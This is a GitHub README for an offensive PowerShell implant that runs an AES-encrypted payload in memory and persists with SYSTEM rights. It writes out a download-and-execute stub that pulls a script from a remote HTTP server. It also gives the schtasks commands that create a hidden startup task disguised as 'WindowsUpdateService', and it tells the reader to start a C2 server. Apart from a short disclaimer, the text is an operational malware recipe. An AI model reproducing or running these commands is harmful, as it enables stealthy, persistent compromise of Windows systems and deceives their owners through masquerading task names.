Skip to content

Khoulykid/Malware

BranchesTags

Repository files navigation

Encrypted PowerShell Implant with SYSTEM-Level Persistence

This project demonstrates a fileless, encrypted PowerShell-based implant that achieves persistent execution with SYSTEM privileges via the Windows Task Scheduler.

⚠️ Disclaimer

This code is provided for educational and authorized testing purposes only. Unauthorized use of this script against systems without explicit permission is illegal and unethical. The authors assume no liability for any misuse or damage caused.

📜 Overview

This project consists of a PowerShell script (implant.ps1) that:

  • Executes an encrypted payload entirely in memory.
  • Installs a SYSTEM-level scheduled task for persistence.
  • Downloads a fresh copy of the implant on each reboot to maintain stealth and flexibility.

🔐 Features

  • Encrypted Payload Execution:

    • AES-CBC encryption with a hardcoded Base64 key and encrypted blob.
    • Decrypted and executed fully in memory using Invoke-Expression.

  • SYSTEM-Level Persistence:

    • Creates a scheduled task (WindowsUpdateService) that:
      • Runs with highest privileges (SYSTEM).
      • Triggers on system startup.
      • Executes a small, encoded PowerShell stub that fetches the implant remotely.

  • Fileless Appearance:

    • No persistent implant is stored on disk.
    • Uses a base64-encoded stub that pulls the actual script dynamically at runtime.

⚙️ Setup Details

  1. Encrypted Payload

    • The payload (payload.enc) is a Base64-encoded string consisting of the IV + ciphertext.
    • Encryption uses AES-128-CBC, and the key is provided as a Base64 string.

  2. Stub Command

    • Encoded and embedded in the scheduled task: 
      IEX (New-Object Net.WebClient).DownloadString('http://192.168.56.1:8000/install.ps1')

  3. Task Creation

    • The task is created using: 
      schtasks.exe /Create /RU "SYSTEM" /RL HIGHEST /SC ONSTART `
  /TN "WindowsUpdateService" `
  /TR "powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand <stub>" /F
    • It is then immediately triggered: 
      schtasks.exe /Run /TN "WindowsUpdateService"

🧪 Testing Environment

  • Tested on: Windows 10 (x64)
  • Listener/Server: Python HTTP server running on http://192.168.56.1:8000/
  • Required: Ensure install.ps1 is hosted on the server and accessible at boot time.

📁 Files

  • implant.ps1: Main implant script with decryption + persistence setup.
  • payload.enc: Encrypted Base64 payload (not included here for safety).
  • README.md: This documentation file.

✅ Usage

🧠 Before running, replace the aesKeyB64 and encryptedBlobB64 values with your actual key and payload data.

  1. Start the Command and Control (C2) server: 
    python3 C2Server4.py

About

No description, website, or topics provided.

Resources

Readme
Activity

Stars

0 stars

Watchers

1 watching

Forks

1 fork
Report repository

Releases

No releases published

Packages

 
 
 

Contributors

Languages